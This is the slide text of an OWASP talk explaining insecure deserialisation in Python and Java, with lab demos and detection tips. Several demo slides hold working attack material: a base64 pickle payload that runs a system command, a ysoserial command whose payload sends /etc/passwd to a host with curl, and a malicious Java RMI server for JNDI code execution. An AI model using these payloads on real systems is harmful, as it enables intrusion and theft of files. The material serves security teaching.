Slide 1

Slide 1 text

Jan 30, 2022 OWASP Vellore Why So Serial? DEMYSTIFYING INSECURE DEMYSTIFYING INSECURE DEMYSTIFYING INSECURE DESERIALISATION DESERIALISATION DESERIALISATION

Slide 2

Slide 2 text

root_js jeyaseelan86 Why So Serial ? Demystifying Insecure Deserialisation $ whoami Jeya Seelan Security Researcher. Bug Hunter. Team Tamil Security Hub. Information Security Engineer, Zoho.

Slide 3

Slide 3 text

Let's get started! Are you ready?

Slide 4

Slide 4 text

Why So Serial ? Demystifying Insecure Deserialisation Today's Agenda 3 6 Questions What can go wrong 1 Preface 4 Demo Time 2 Serialisation what? why? where? 5 Deserialization

Slide 5

Slide 5 text

Object Oriented Programming Preface Object-Oriented Programming is all about creating “objects”. An object is a group of interrelated variables and functions. These variables are often referred to as properties of the object and functions are referred to as the behavior of the objects. Example Human Object Height, Name, Age, Gender, Mother Tongue, etc...

Slide 6

Slide 6 text

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male PROBLEM ?? We need to store or send the object without altering the state of Human object.

Slide 7

Slide 7 text

THE SOLUTION SERIALIZATION

Slide 8

Slide 8 text

What? Why? Where? SERIALISATION

Slide 9

Slide 9 text

What? Serialization is the process of converting an object state into a format that can be transmitted or stored. It is also known as Marshalling or pickling Many popular programming languages have serialization support included in the language core or in the standard library.

Slide 10

Slide 10 text

Why? Objects are composed of several components, saving or delivering all the parts typically requires significant coding effort, so serialization is a standard way to capture the object into a sharable format. 👉🏻 Easy to transfer 👉🏻 Reversible to original form 👉🏻Persist State

Slide 11

Slide 11 text

Where? transferring data through the wires (messaging). storing data (in databases, on hard disk drives). remote procedure calls, e.g., as in SOAP. Caching and Persistence HTTP cookies, View State

Slide 12

Slide 12 text

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : AABBCC Serialisation {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"M ale","GovtID":"AABBCC"}

Slide 13

Slide 13 text

DESERIALISATION Deserialization is the opposite of serialization. Deserialization is the process of reconstructing a data structure or object from a series of bytes or a string.

Slide 14

Slide 14 text

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : AABBCC {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"M ale","GovtID":"AABBCC"} Deserialisation

Slide 15

Slide 15 text

WHAT CAN GO WRONG? HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : AABBCC

Slide 16

Slide 16 text

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : QQWWEE {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"Male", "GovtID":"QQWWEE"} Deserialisation MANIPULATED SERIALISED DATA MODIFIED OBJECT Insecure

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

No content

Slide 19

Slide 19 text

DEMO TIME !

Slide 20

Slide 20 text

DEMO - I PYTHON DESERIALISATION To Setup the Lab docker pull jeyaseelan86/pydeser:pickle

Slide 21

Slide 21 text

Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

Slide 22

Slide 22 text

Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

Slide 23

Slide 23 text

EXPLOIT gASVOAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjB10b3VjaCBoYWNrZWRieWRlc2VyaWFsaXNhdGlvbpSFlFKULg==

Slide 24

Slide 24 text

DEMO - II JAVA JSF VIEWSTATE DESERIALISATION To Setup the Lab docker pull jeyaseelan86/javadeser:jsf

Slide 25

Slide 25 text

JSF Viewstate Deserialisation

Slide 26

Slide 26 text

JSF Viewstate Deserialisation

Slide 27

Slide 27 text

JSF Viewstate Deserialisation

Slide 28

Slide 28 text

JSF Viewstate Deserialisation

Slide 29

Slide 29 text

JSF Viewstate Deserialisation

Slide 30

Slide 30 text

JSF Viewstate Deserialisation

Slide 31

Slide 31 text

JSF Viewstate Deserialisation java -jar ysoserial-master-8eb5cbfbf6-1.jar Jdk7u21 "curl -d @/etc/passwd http://ip"

Slide 32

Slide 32 text

JSF Viewstate Deserialisation

Slide 33

Slide 33 text

DETECTING INSECURE DESERIALISATION

Slide 34

Slide 34 text

WHITE BOX APPROACH PYTHON pickle.loads() marshall.loads() pyyaml.loads() jsonpickle.decode()

Slide 35

Slide 35 text

WHITE BOX APPROACH JAVA ObjectInputStream with readObject Use of readObject, readObjectNodData, readResolve or readExternal XMLdecoder with external user defined parameters Serializable

Slide 36

Slide 36 text

BLACK BOX APPROACH JAVA AC ED 00 05 in HEX H4sIAAAAAAAAAJ in GZIP Base64 rO0 in Base64 Content-type header application/x-java-serialized- object

Slide 37

Slide 37 text

WHITE BOX APPROACH PYTHON pickle.loads() marshall.loads() pyyaml.loads() jsonpickle.decode()

Slide 38

Slide 38 text

DETECTION TOOLS JAVA - YSOSERIAL, MARSHALLSEC , JEXBOSS .NET - YSOSERIAL.NET PYTHON - DESER-PY

Slide 39

Slide 39 text

NOTABLE BUGS 1 pickle 3 pyyaml deser 5 Xtreme Object Deser 2 Deserilisation in oracle weblogic , JBoss, jenkins etc.. 4 Ruby Deserialisation 6 Jackson Deserialisation

Slide 40

Slide 40 text

BONUS

Slide 41

Slide 41 text

import java.rmi.registry.*; import com.sun.jndi.rmi.registry.*; import javax.naming.*; import org.apache.naming.ResourceRef; public class EvilRMIServerNew { public static void main(String[] args) throws Exception { System.out.println("Creating evil RMI registry on port 1097"); Registry registry = LocateRegistry.createRegistry(1097); //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code ref.add(new StringRefAddr("forceString", "x=eval")); //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")")); ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); registry.bind("Object", referenceWrapper); } }

Slide 42

Slide 42 text

Questions ? Shoot your Doubts?

Slide 43

Slide 43 text

Thank you! Have a great day ahead.

Slide 44

Slide 44 text

Reach me on ! @root_js @jeyaseelans @jeyaseelans86 @dramatic_admin